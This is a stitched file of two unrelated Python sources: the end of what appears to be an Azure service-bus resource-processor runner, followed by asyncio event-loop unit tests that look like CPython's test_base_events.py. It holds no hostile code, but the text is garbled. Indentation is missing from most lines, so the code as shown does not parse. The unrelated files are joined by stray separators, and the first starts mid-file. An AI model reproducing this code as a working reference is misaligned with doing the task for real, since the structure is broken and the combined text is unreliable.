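# "outputs" field of the success message it posts to the deployment status queue.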
async def runner(logger_adapter: logging.LoggerAdapter, config: dict):
async with default_credentials(config["vmss_msi_id"]) as credential:
service_bus_client = ServiceBusClient(config["service_bus_namespace"], credential)
await receive_message(service_bus_client, logger_adapter, config)
def start_runner_process(config: dict):
    # Set up logger adapter copy for this process
    logger_adapter = set_up_logger(enable_console_logging=False)
    event_loop = asyncio.get_event_loop()
    asyncio.ensure_future(runner(logger_adapter, config))
    logger_adapter.info("Started resource processor")
    event_loop.run_forever()
if __name__ == "__main__":
httpserver_thread = threading.Thread(target=start_server)
httpserver_thread.start()
logger_adapter: logging.LoggerAdapter = set_up_logger(enable_console_logging=True)
config = set_up_config(logger_adapter)
logger_adapter.info("Started http server")
logger_adapter.info(f'Starting {str(config["number_processes_int"])} processes...')
for i in range(config["number_processes_int"]):
logger_adapter.info(f'Starting process {str(i)}')
        process = Process(target=start_runner_process, args=(config,))
process.start()
|
test_base_events.py
|
"""Tests for base_events.py"""
import errno
import logging
import math
import os
import socket
import sys
import threading
import time
import unittest
from unittest import mock
import asyncio
from asyncio import base_events
from asyncio import constants
from asyncio import events
from test.test_asyncio import utils as test_utils
from test import support
from test.support.script_helper import assert_python_ok
MOCK_ANY = mock.ANY
PY34 = sys.version_info >= (3, 4)
def mock_socket_module():
m_socket = mock.MagicMock(spec=socket)
for name in (
'AF_INET', 'AF_INET6', 'AF_UNSPEC', 'IPPROTO_TCP', 'IPPROTO_UDP',
'SOCK_STREAM', 'SOCK_DGRAM', 'SOL_SOCKET', 'SO_REUSEADDR', 'inet_pton'
):
if hasattr(socket, name):
setattr(m_socket, name, getattr(socket, name))
else:
delattr(m_socket, name)
m_socket.socket = mock.MagicMock()
m_socket.socket.return_value = test_utils.mock_nonblocking_socket()
m_socket.getaddrinfo._is_coroutine = False
return m_socket
def patch_socket(f):
return mock.patch('asyncio.base_events.socket',
new_callable=mock_socket_module)(f)
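# Note: @patch_socket swaps the ``socket`` module referenced inside asyncio.base_events
# for the MagicMock built by mock_socket_module(), so a decorated test can observe or
# fail socket creation without touching the real network stack; the mock module is
# handed to the test as an extra argument, e.g.:
#
#     @patch_socket
#     def test_something(self, m_socket):
#         m_socket.socket.side_effect = OSError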
class BaseEventTests(test_utils.TestCase):
def test_ipaddr_info(self):
UNSPEC = socket.AF_UNSPEC
INET = socket.AF_INET
INET6 = socket.AF_INET6
STREAM = socket.SOCK_STREAM
DGRAM = socket.SOCK_DGRAM
TCP = socket.IPPROTO_TCP
UDP = socket.IPPROTO_UDP
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', 1, INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info(b'1.2.3.4', 1, INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, STREAM, TCP))
self.assertEqual(
(INET, DGRAM, UDP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, DGRAM, UDP))
# Socket type STREAM implies TCP protocol.
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, STREAM, 0))
# Socket type DGRAM implies UDP protocol.
self.assertEqual(
(INET, DGRAM, UDP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, DGRAM, 0))
# No socket type.
self.assertIsNone(
base_events._ipaddr_info('1.2.3.4', 1, UNSPEC, 0, 0))
# IPv4 address with family IPv6.
self.assertIsNone(
base_events._ipaddr_info('1.2.3.4', 1, INET6, STREAM, TCP))
self.assertEqual(
(INET6, STREAM, TCP, '', ('::3', 1, 0, 0)),
base_events._ipaddr_info('::3', 1, INET6, STREAM, TCP))
self.assertEqual(
(INET6, STREAM, TCP, '', ('::3', 1, 0, 0)),
base_events._ipaddr_info('::3', 1, UNSPEC, STREAM, TCP))
# IPv6 address with family IPv4.
self.assertIsNone(
base_events._ipaddr_info('::3', 1, INET, STREAM, TCP))
# IPv6 address with zone index.
self.assertIsNone(
base_events._ipaddr_info('::3%lo0', 1, INET6, STREAM, TCP))
def test_port_parameter_types(self):
# Test obscure kinds of arguments for "port".
INET = socket.AF_INET
STREAM = socket.SOCK_STREAM
TCP = socket.IPPROTO_TCP
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 0)),
base_events._ipaddr_info('1.2.3.4', None, INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 0)),
base_events._ipaddr_info('1.2.3.4', b'', INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 0)),
base_events._ipaddr_info('1.2.3.4', '', INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', '1', INET, STREAM, TCP))
self.assertEqual(
(INET, STREAM, TCP, '', ('1.2.3.4', 1)),
base_events._ipaddr_info('1.2.3.4', b'1', INET, STREAM, TCP))
@patch_socket
def test_ipaddr_info_no_inet_pton(self, m_socket):
del m_socket.inet_pton
self.assertIsNone(base_events._ipaddr_info('1.2.3.4', 1,
socket.AF_INET,
socket.SOCK_STREAM,
socket.IPPROTO_TCP))
class BaseEventLoopTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = base_events.BaseEventLoop()
self.loop._selector = mock.Mock()
self.loop._selector.select.return_value = ()
self.set_event_loop(self.loop)
def test_not_implemented(self):
m = mock.Mock()
self.assertRaises(
NotImplementedError,
self.loop._make_socket_transport, m, m)
self.assertRaises(
NotImplementedError,
self.loop._make_ssl_transport, m, m, m, m)
self.assertRaises(
NotImplementedError,
self.loop._make_datagram_transport, m, m)
self.assertRaises(
NotImplementedError, self.loop._process_events, [])
self.assertRaises(
NotImplementedError, self.loop._write_to_self)
self.assertRaises(
NotImplementedError,
self.loop._make_read_pipe_transport, m, m)
self.assertRaises(
NotImplementedError,
self.loop._make_write_pipe_transport, m, m)
gen = self.loop._make_subprocess_transport(m, m, m, m, m, m, m)
with self.assertRaises(NotImplementedError):
gen.send(None)
def test_close(self):
self.assertFalse(self.loop.is_closed())
self.loop.close()
self.assertTrue(self.loop.is_closed())
# it should be possible to call close() more than once
self.loop.close()
self.loop.close()
# operation blocked when the loop is closed
f = asyncio.Future(loop=self.loop)
self.assertRaises(RuntimeError, self.loop.run_forever)
self.assertRaises(RuntimeError, self.loop.run_until_complete, f)
def test__add_callback_handle(self):
h = asyncio.Handle(lambda: False, (), self.loop, None)
self.loop._add_callback(h)
self.assertFalse(self.loop._scheduled)
self.assertIn(h, self.loop._ready)
def test__add_callback_cancelled_handle(self):
h = asyncio.Handle(lambda: False, (), self.loop, None)
h.cancel()
self.loop._add_callback(h)
self.assertFalse(self.loop._scheduled)
self.assertFalse(self.loop._ready)
def test_set_default_executor(self):
executor = mock.Mock()
self.loop.set_default_executor(executor)
self.assertIs(executor, self.loop._default_executor)
def test_call_soon(self):
def cb():
pass
h = self.loop.call_soon(cb)
self.assertEqual(h._callback, cb)
self.assertIsInstance(h, asyncio.Handle)
self.assertIn(h, self.loop._ready)
def test_call_soon_non_callable(self):
self.loop.set_debug(True)
with self.assertRaisesRegex(TypeError, 'a callable object'):
self.loop.call_soon(1)
def test_call_later(self):
def cb():
pass
h = self.loop.call_later(10.0, cb)
self.assertIsInstance(h, asyncio.TimerHandle)
self.assertIn(h, self.loop._scheduled)
self.assertNotIn(h, self.loop._ready)
def test_call_later_negative_delays(self):
calls = []
def cb(arg):
calls.append(arg)
self.loop._process_events = mock.Mock()
self.loop.call_later(-1, cb, 'a')
self.loop.call_later(-2, cb, 'b')
test_utils.run_briefly(self.loop)
self.assertEqual(calls, ['b', 'a'])
def test_time_and_call_at(self):
def cb():
self.loop.stop()
self.loop._process_events = mock.Mock()
delay = 0.1
when = self.loop.time() + delay
self.loop.call_at(when, cb)
t0 = self.loop.time()
self.loop.run_forever()
dt = self.loop.time() - t0
# 50 ms: maximum granularity of the event loop
self.assertGreaterEqual(dt, delay - 0.050, dt)
# tolerate a difference of +800 ms because some Python buildbots
# are really slow
self.assertLessEqual(dt, 0.9, dt)
def check_thread(self, loop, debug):
def cb():
pass
loop.set_debug(debug)
if debug:
msg = ("Non-thread-safe operation invoked on an event loop other "
"than the current one")
with self.assertRaisesRegex(RuntimeError, msg):
loop.call_soon(cb)
with self.assertRaisesRegex(RuntimeError, msg):
loop.call_later(60, cb)
with self.assertRaisesRegex(RuntimeError, msg):
loop.call_at(loop.time() + 60, cb)
else:
loop.call_soon(cb)
loop.call_later(60, cb)
loop.call_at(loop.time() + 60, cb)
def test_check_thread(self):
def check_in_thread(loop, event, debug, create_loop, fut):
# wait until the event loop is running
event.wait()
try:
if create_loop:
loop2 = base_events.BaseEventLoop()
try:
asyncio.set_event_loop(loop2)
self.check_thread(loop, debug)
finally:
asyncio.set_event_loop(None)
loop2.close()
else:
self.check_thread(loop, debug)
except Exception as exc:
loop.call_soon_threadsafe(fut.set_exception, exc)
else:
loop.call_soon_threadsafe(fut.set_result, None)
def test_thread(loop, debug, create_loop=False):
event = threading.Event()
fut = asyncio.Future(loop=loop)
loop.call_soon(event.set)
args = (loop, event, debug, create_loop, fut)
thread = threading.Thread(target=check_in_thread, args=args)
thread.start()
loop.run_until_complete(fut)
thread.join()
self.loop._process_events = mock.Mock()
self.loop._write_to_self = mock.Mock()
# raise RuntimeError if the thread has no event loop
test_thread(self.loop, True)
# check disabled if debug mode is disabled
test_thread(self.loop, False)
# raise RuntimeError if the event loop of the thread is not the called
# event loop
test_thread(self.loop, True, create_loop=True)
# check disabled if debug mode is disabled
test_thread(self.loop, False, create_loop=True)
def test__run_once(self):
h1 = asyncio.TimerHandle(time.monotonic() + 5.0, lambda: True, (),
self.loop, None)
h2 = asyncio.TimerHandle(time.monotonic() + 10.0, lambda: True, (),
self.loop, None)
h1.cancel()
self.loop._process_events = mock.Mock()
self.loop._scheduled.append(h1)
self.loop._scheduled.append(h2)
self.loop._run_once()
t = self.loop._selector.select.call_args[0][0]
self.assertTrue(9.5 < t < 10.5, t)
self.assertEqual([h2], self.loop._scheduled)
self.assertTrue(self.loop._process_events.called)
def test_set_debug(self):
self.loop.set_debug(True)
self.assertTrue(self.loop.get_debug())
self.loop.set_debug(False)
self.assertFalse(self.loop.get_debug())
@mock.patch('asyncio.base_events.logger')
def test__run_once_logging(self, m_logger):
def slow_select(timeout):
# Sleep a bit longer than a second to avoid timer resolution
# issues.
time.sleep(1.1)
return []
# logging needs debug flag
self.loop.set_debug(True)
# Log to INFO level if timeout > 1.0 sec.
self.loop._selector.select = slow_select
self.loop._process_events = mock.Mock()
self.loop._run_once()
self.assertEqual(logging.INFO, m_logger.log.call_args[0][0])
def fast_select(timeout):
time.sleep(0.001)
return []
self.loop._selector.select = fast_select
self.loop._run_once()
self.assertEqual(logging.DEBUG, m_logger.log.call_args[0][0])
def test__run_once_schedule_handle(self):
handle = None
processed = False
def cb(loop):
nonlocal processed, handle
processed = True
handle = loop.call_soon(lambda: True)
h = asyncio.TimerHandle(time.monotonic() - 1, cb, (self.loop,),
self.loop, None)
self.loop._process_events = mock.Mock()
self.loop._scheduled.append(h)
self.loop._run_once()
self.assertTrue(processed)
self.assertEqual([handle], list(self.loop._ready))
def test__run_once_cancelled_event_cleanup(self):
self.loop._process_events = mock.Mock()
self.assertTrue(
0 < base_events._MIN_CANCELLED_TIMER_HANDLES_FRACTION < 1.0)
def cb():
pass
# Set up one "blocking" event that will not be cancelled to
# ensure later cancelled events do not make it to the head
# of the queue and get cleaned.
not_cancelled_count = 1
self.loop.call_later(3000, cb)
# Add less than threshold (base_events._MIN_SCHEDULED_TIMER_HANDLES)
# cancelled handles, ensure they aren't removed
cancelled_count = 2
for x in range(2):
h = self.loop.call_later(3600, cb)
h.cancel()
# Add some cancelled events that will be at head and removed
cancelled_count += 2
for x in range(2):
h = self.loop.call_later(100, cb)
h.cancel()
# This test is invalid if _MIN_SCHEDULED_TIMER_HANDLES is too low
self.assertLessEqual(cancelled_count + not_cancelled_count,
base_events._MIN_SCHEDULED_TIMER_HANDLES)
self.assertEqual(self.loop._timer_cancelled_count, cancelled_count)
self.loop._run_once()
cancelled_count -= 2
self.assertEqual(self.loop._timer_cancelled_count, cancelled_count)
self.assertEqual(len(self.loop._scheduled),
cancelled_count + not_cancelled_count)
# Need enough events to pass _MIN_CANCELLED_TIMER_HANDLES_FRACTION
# so that deletion of cancelled events will occur on next _run_once
add_cancel_count = int(math.ceil(
base_events._MIN_SCHEDULED_TIMER_HANDLES *
base_events._MIN_CANCELLED_TIMER_HANDLES_FRACTION)) + 1
add_not_cancel_count = max(base_events._MIN_SCHEDULED_TIMER_HANDLES -
add_cancel_count, 0)
# Add some events that will not be cancelled
not_cancelled_count += add_not_cancel_count
for x in range(add_not_cancel_count):
self.loop.call_later(3600, cb)
# Add enough cancelled events
cancelled_count += add_cancel_count
for x in range(add_cancel_count):
h = self.loop.call_later(3600, cb)
h.cancel()
# Ensure all handles are still scheduled
self.assertEqual(len(self.loop._scheduled),
cancelled_count + not_cancelled_count)
self.loop._run_once()
# Ensure cancelled events were removed
self.assertEqual(len(self.loop._scheduled), not_cancelled_count)
# Ensure only uncancelled events remain scheduled
self.assertTrue(all([not x._cancelled for x in self.loop._scheduled]))
def test_run_until_complete_type_error(self):
self.assertRaises(TypeError,
self.loop.run_until_complete, 'blah')
def test_run_until_complete_loop(self):
task = asyncio.Future(loop=self.loop)
other_loop = self.new_test_loop()
self.addCleanup(other_loop.close)
self.assertRaises(ValueError,
other_loop.run_until_complete, task)
def test_run_until_complete_loop_orphan_future_close_loop(self):
class ShowStopper(BaseException):
pass
async def foo(delay):
await asyncio.sleep(delay, loop=self.loop)
def throw():
raise ShowStopper
self.loop._process_events = mock.Mock()
self.loop.call_soon(throw)
try:
self.loop.run_until_complete(foo(0.1))
except ShowStopper:
pass
# This call fails if run_until_complete does not clean up
# done-callback for the previous future.
self.loop.run_until_complete(foo(0.2))
def test_subprocess_exec_invalid_args(self):
args = [sys.executable, '-c', 'pass']
# missing program parameter (empty args)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol)
# expected multiple arguments, not a list
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, args)
# program arguments must be strings, not int
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, sys.executable, 123)
# universal_newlines, shell, bufsize must not be set
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, *args, universal_newlines=True)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, *args, shell=True)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_exec,
asyncio.SubprocessProtocol, *args, bufsize=4096)
def test_subprocess_shell_invalid_args(self):
# expected a string, not an int or a list
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, 123)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, [sys.executable, '-c', 'pass'])
# universal_newlines, shell, bufsize must not be set
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, 'exit 0', universal_newlines=True)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, 'exit 0', shell=True)
self.assertRaises(TypeError,
self.loop.run_until_complete, self.loop.subprocess_shell,
asyncio.SubprocessProtocol, 'exit 0', bufsize=4096)
def test_default_exc_handler_callback(self):
self.loop._process_events = mock.Mock()
def zero_error(fut):
fut.set_result(True)
1/0
# Test call_soon (events.Handle)
with mock.patch('asyncio.base_events.logger') as log:
fut = asyncio.Future(loop=self.loop)
self.loop.call_soon(zero_error, fut)
fut.add_done_callback(lambda fut: self.loop.stop())
self.loop.run_forever()
log.error.assert_called_with(
test_utils.MockPattern('Exception in callback.*zero'),
exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
# Test call_later (events.TimerHandle)
with mock.patch('asyncio.base_events.logger') as log:
fut = asyncio.Future(loop=self.loop)
self.loop.call_later(0.01, zero_error, fut)
fut.add_done_callback(lambda fut: self.loop.stop())
self.loop.run_forever()
log.error.assert_called_with(
test_utils.MockPattern('Exception in callback.*zero'),
exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
def test_default_exc_handler_coro(self):
self.loop._process_events = mock.Mock()
@asyncio.coroutine
def zero_error_coro():
yield from asyncio.sleep(0.01, loop=self.loop)
1/0
# Test Future.__del__
with mock.patch('asyncio.base_events.logger') as log:
fut = asyncio.ensure_future(zero_error_coro(), loop=self.loop)
fut.add_done_callback(lambda *args: self.loop.stop())
self.loop.run_forever()
fut = None # Trigger Future.__del__ or futures._TracebackLogger
support.gc_collect()
if PY34:
# Future.__del__ in Python 3.4 logs error with
# an actual exception context
log.error.assert_called_with(
test_utils.MockPattern('.*exception was never retrieved'),
exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
else:
# futures._TracebackLogger logs only textual traceback
log.error.assert_called_with(
test_utils.MockPattern(
'.*exception was never retrieved.*ZeroDiv'),
exc_info=False)
def test_set_exc_handler_invalid(self):
with self.assertRaisesRegex(TypeError, 'A callable object or None'):
self.loop.set_exception_handler('spam')
def test_set_exc_handler_custom(self):
def zero_error():
1/0
def run_loop():
handle = self.loop.call_soon(zero_error)
self.loop._run_once()
return handle
self.loop.set_debug(True)
self.loop._process_events = mock.Mock()
self.assertIsNone(self.loop.get_exception_handler())
mock_handler = mock.Mock()
self.loop.set_exception_handler(mock_handler)
self.assertIs(self.loop.get_exception_handler(), mock_handler)
handle = run_loop()
mock_handler.assert_called_with(self.loop, {
'exception': MOCK_ANY,
'message': test_utils.MockPattern(
'Exception in callback.*zero_error'),
'handle': handle,
'source_traceback': handle._source_traceback,
})
mock_handler.reset_mock()
self.loop.set_exception_handler(None)
with mock.patch('asyncio.base_events.logger') as log:
run_loop()
log.error.assert_called_with(
test_utils.MockPattern(
'Exception in callback.*zero'),
exc_info=(ZeroDivisionError, MOCK_ANY, MOCK_ANY))
assert not mock_handler.called
def test_set_exc_handler_broken(self):
def run_loop():
def zero_error():
1/0
self.loop.call_soon(zero_error)
self.loop._run_once()
def handler(loop, context):
raise AttributeError('spam')
self.loop._process_events = mock.Mock()
self.loop.set_exception_handler(handler)
with mock.patch('asyncio.base_events.logger') as log:
run_loop()
log.error.assert_called_with(
test_utils.MockPattern(
'Unhandled error in exception handler'),
exc_info=(AttributeError, MOCK_ANY, MOCK_ANY))
def test_default_exc_handler_broken(self):
_context = None
class Loop(base_events.BaseEventLoop):
_selector = mock.Mock()
_process_events = mock.Mock()
def default_exception_handler(self, context):
nonlocal _context
_context = context
# Simulates custom buggy "default_exception_handler"
raise ValueError('spam')
loop = Loop()
self.addCleanup(loop.close)
asyncio.set_event_loop(loop)
def run_loop():
def zero_error():
1/0
loop.call_soon(zero_error)
loop._run_once()
with mock.patch('asyncio.base_events.logger') as log:
run_loop()
log.error.assert_called_with(
'Exception in default exception handler',
exc_info=True)
def custom_handler(loop, context):
raise ValueError('ham')
_context = None
loop.set_exception_handler(custom_handler)
with mock.patch('asyncio.base_events.logger') as log:
run_loop()
log.error.assert_called_with(
test_utils.MockPattern('Exception in default exception.*'
'while handling.*in custom'),
exc_info=True)
# Check that original context was passed to default
# exception handler.
self.assertIn('context', _context)
self.assertIs(type(_context['context']['exception']),
ZeroDivisionError)
def test_set_task_factory_invalid(self):
with self.assertRaisesRegex(
TypeError, 'task factory must be a callable or None'):
self.loop.set_task_factory(1)
self.assertIsNone(self.loop.get_task_factory())
def test_set_task_factory(self):
self.loop._process_events = mock.Mock()
class MyTask(asyncio.Task):
pass
@asyncio.coroutine
def coro():
pass
factory = lambda loop, coro: MyTask(coro, loop=loop)
self.assertIsNone(self.loop.get_task_factory())
self.loop.set_task_factory(factory)
self.assertIs(self.loop.get_task_factory(), factory)
task = self.loop.create_task(coro())
self.assertTrue(isinstance(task, MyTask))
self.loop.run_until_complete(task)
self.loop.set_task_factory(None)
self.assertIsNone(self.loop.get_task_factory())
task = self.loop.create_task(coro())
self.assertTrue(isinstance(task, asyncio.Task))
self.assertFalse(isinstance(task, MyTask))
self.loop.run_until_complete(task)
def test_env_var_debug(self):
code = '\n'.join((
'import asyncio',
'loop = asyncio.get_event_loop()',
'print(loop.get_debug())'))
# Test with -E to not fail if the unit test was run with
# PYTHONASYNCIODEBUG set to a non-empty string
sts, stdout, stderr = assert_python_ok('-E', '-c', code)
self.assertEqual(stdout.rstrip(), b'False')
sts, stdout, stderr = assert_python_ok('-c', code,
PYTHONASYNCIODEBUG='',
PYTHONDEVMODE='')
self.assertEqual(stdout.rstrip(), b'False')
sts, stdout, stderr = assert_python_ok('-c', code,
PYTHONASYNCIODEBUG='1',
PYTHONDEVMODE='')
self.assertEqual(stdout.rstrip(), b'True')
sts, stdout, stderr = assert_python_ok('-E', '-c', code,
PYTHONASYNCIODEBUG='1')
self.assertEqual(stdout.rstrip(), b'False')
# -X dev
sts, stdout, stderr = assert_python_ok('-E', '-X', 'dev',
'-c', code)
self.assertEqual(stdout.rstrip(), b'True')
def test_create_task(self):
class MyTask(asyncio.Task):
pass
@asyncio.coroutine
def test():
pass
class EventLoop(base_events.BaseEventLoop):
def create_task(self, coro):
return MyTask(coro, loop=loop)
loop = EventLoop()
self.set_event_loop(loop)
coro = test()
task = asyncio.ensure_future(coro, loop=loop)
self.assertIsInstance(task, MyTask)
# make warnings quiet
task._log_destroy_pending = False
coro.close()
def test_run_forever_keyboard_interrupt(self):
# Python issue #22601: ensure that the temporary task created by
        # run_forever() consumes the KeyboardInterrupt and so doesn't log
# a warning
@asyncio.coroutine
def raise_keyboard_interrupt():
raise KeyboardInterrupt
self.loop._process_events = mock.Mock()
self.loop.call_exception_handler = mock.Mock()
try:
self.loop.run_until_complete(raise_keyboard_interrupt())
except KeyboardInterrupt:
pass
self.loop.close()
support.gc_collect()
self.assertFalse(self.loop.call_exception_handler.called)
def test_run_until_complete_baseexception(self):
# Python issue #22429: run_until_complete() must not schedule a pending
# call to stop() if the future raised a BaseException
@asyncio.coroutine
def raise_keyboard_interrupt():
raise KeyboardInterrupt
self.loop._process_events = mock.Mock()
try:
self.loop.run_until_complete(raise_keyboard_interrupt())
except KeyboardInterrupt:
pass
def func():
self.loop.stop()
func.called = True
func.called = False
try:
self.loop.call_soon(func)
self.loop.run_forever()
except KeyboardInterrupt:
pass
self.assertTrue(func.called)
def test_single_selecter_event_callback_after_stopping(self):
# Python issue #25593: A stopped event loop may cause event callbacks
# to run more than once.
event_sentinel = object()
callcount = 0
doer = None
def proc_events(event_list):
nonlocal doer
if event_sentinel in event_list:
doer = self.loop.call_soon(do_event)
def do_event():
nonlocal callcount
callcount += 1
self.loop.call_soon(clear_selector)
def clear_selector():
doer.cancel()
self.loop._selector.select.return_value = ()
self.loop._process_events = proc_events
self.loop._selector.select.return_value = (event_sentinel,)
for i in range(1, 3):
with self.subTest('Loop %d/2' % i):
self.loop.call_soon(self.loop.stop)
self.loop.run_forever()
self.assertEqual(callcount, 1)
def test_run_once(self):
# Simple test for test_utils.run_once(). It may seem strange
# to have a test for this (the function isn't even used!) but
        # it's a de facto standard API for library tests. This tests
# the idiom: loop.call_soon(loop.stop); loop.run_forever().
count = 0
def callback():
nonlocal count
count += 1
self.loop._process_events = mock.Mock()
self.loop.call_soon(callback)
test_utils.run_once(self.loop)
self.assertEqual(count, 1)
def test_run_forever_pre_stopped(self):
# Test that the old idiom for pre-stopping the loop works.
self.loop._process_events = mock.Mock()
self.loop.stop()
self.loop.run_forever()
self.loop._selector.select.assert_called_once_with(0)
async def leave_unfinalized_asyncgen(self):
# Create an async generator, iterate it partially, and leave it
# to be garbage collected.
# Used in async generator finalization tests.
# Depends on implementation details of garbage collector. Changes
# in gc may break this function.
status = {'started': False,
'stopped': False,
'finalized': False}
async def agen():
status['started'] = True
try:
for item in ['ZERO', 'ONE', 'TWO', 'THREE', 'FOUR']:
yield item
finally:
status['finalized'] = True
ag = agen()
ai = ag.__aiter__()
async def iter_one():
try:
item = await ai.__anext__()
except StopAsyncIteration:
return
if item == 'THREE':
status['stopped'] = True
return
asyncio.create_task(iter_one())
asyncio.create_task(iter_one())
return status
def test_asyncgen_finalization_by_gc(self):
# Async generators should be finalized when garbage collected.
self.loop._process_events = mock.Mock()
self.loop._write_to_self = mock.Mock()
with support.disable_gc():
status = self.loop.run_until_complete(self.leave_unfinalized_asyncgen())
while not status['stopped']:
test_utils.run_briefly(self.loop)
self.assertTrue(status['started'])
self.assertTrue(status['stopped'])
self.assertFalse(status['finalized'])
support.gc_collect()
test_utils.run_briefly(self.loop)
self.assertTrue(status['finalized'])
def test_asyncgen_finalization_by_gc_in_other_thread(self):
# Python issue 34769: If garbage collector runs in another
# thread, async generators will not finalize in debug
# mode.
self.loop._process_events = mock.Mock()
self.loop._write_to_self = mock.Mock()
self.loop.set_debug(True)
with support.disable_gc():
status = self.loop.run_until_complete(self.leave_unfinalized_asyncgen())
while not status['stopped']:
test_utils.run_briefly(self.loop)
self.assertTrue(status['started'])
self.assertTrue(status['stopped'])
self.assertFalse(status['finalized'])
self.loop.run_until_complete(
self.loop.run_in_executor(None, support.gc_collect))
test_utils.run_briefly(self.loop)
self.assertTrue(status['finalized'])
class MyProto(asyncio.Protocol):
done = None
def __init__(self, create_future=False):
self.state = 'INITIAL'
self.nbytes = 0
if create_future:
self.done = asyncio.Future()
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'CONNECTED'
transport.write(b'GET / HTTP/1.0\r\nHost: example.com\r\n\r\n')
def data_received(self, data):
assert self.state == 'CONNECTED', self.state
self.nbytes += len(data)
def eof_received(self):
assert self.state == 'CONNECTED', self.state
self.state = 'EOF'
def connection_lost(self, exc):
assert self.state in ('CONNECTED', 'EOF'), self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class MyDatagramProto(asyncio.DatagramProtocol):
done = None
def __init__(self, create_future=False, loop=None):
self.state = 'INITIAL'
self.nbytes = 0
if create_future:
self.done = asyncio.Future(loop=loop)
def connection_made(self, transport):
self.transport = transport
assert self.state == 'INITIAL', self.state
self.state = 'INITIALIZED'
def datagram_received(self, data, addr):
assert self.state == 'INITIALIZED', self.state
self.nbytes += len(data)
def error_received(self, exc):
assert self.state == 'INITIALIZED', self.state
def connection_lost(self, exc):
assert self.state == 'INITIALIZED', self.state
self.state = 'CLOSED'
if self.done:
self.done.set_result(None)
class BaseEventLoopWithSelectorTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = asyncio.new_event_loop()
self.set_event_loop(self.loop)
@mock.patch('socket.getnameinfo')
def test_getnameinfo(self, m_gai):
m_gai.side_effect = lambda *args: 42
r = self.loop.run_until_complete(self.loop.getnameinfo(('abc', 123)))
self.assertEqual(r, 42)
@patch_socket
def test_create_connection_multiple_errors(self, m_socket):
class MyProto(asyncio.Protocol):
pass
@asyncio.coroutine
def getaddrinfo(*args, **kw):
yield from []
return [(2, 1, 6, '', ('107.6.106.82', 80)),
(2, 1, 6, '', ('107.6.106.82', 80))]
def getaddrinfo_task(*args, **kwds):
return asyncio.Task(getaddrinfo(*args, **kwds), loop=self.loop)
idx = -1
errors = ['err1', 'err2']
def _socket(*args, **kw):
nonlocal idx, errors
idx += 1
raise OSError(errors[idx])
m_socket.socket = _socket
self.loop.getaddrinfo = getaddrinfo_task
coro = self.loop.create_connection(MyProto, 'example.com', 80)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(coro)
self.assertEqual(str(cm.exception), 'Multiple exceptions: err1, err2')
@patch_socket
def test_create_connection_timeout(self, m_socket):
# Ensure that the socket is closed on timeout
sock = mock.Mock()
m_socket.socket.return_value = sock
def getaddrinfo(*args, **kw):
fut = asyncio.Future(loop=self.loop)
addr = (socket.AF_INET, socket.SOCK_STREAM, 0, '',
('127.0.0.1', 80))
fut.set_result([addr])
return fut
self.loop.getaddrinfo = getaddrinfo
with mock.patch.object(self.loop, 'sock_connect',
side_effect=asyncio.TimeoutError):
coro = self.loop.create_connection(MyProto, '127.0.0.1', 80)
with self.assertRaises(asyncio.TimeoutError):
self.loop.run_until_complete(coro)
self.assertTrue(sock.close.called)
def test_create_connection_host_port_sock(self):
coro = self.loop.create_connection(
MyProto, 'example.com', 80, sock=object())
self.assertRaises(ValueError, self.loop.run_until_complete, coro)
def test_create_connection_wrong_sock(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
with sock:
coro = self.loop.create_connection(MyProto, sock=sock)
with self.assertRaisesRegex(ValueError,
'A Stream Socket was expected'):
self.loop.run_until_complete(coro)
def test_create_server_wrong_sock(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
with sock:
coro = self.loop.create_server(MyProto, sock=sock)
with self.assertRaisesRegex(ValueError,
'A Stream Socket was expected'):
self.loop.run_until_complete(coro)
def test_create_server_ssl_timeout_for_plain_socket(self):
coro = self.loop.create_server(
MyProto, 'example.com', 80, ssl_handshake_timeout=1)
with self.assertRaisesRegex(
ValueError,
'ssl_handshake_timeout is only meaningful with ssl'):
self.loop.run_until_complete(coro)
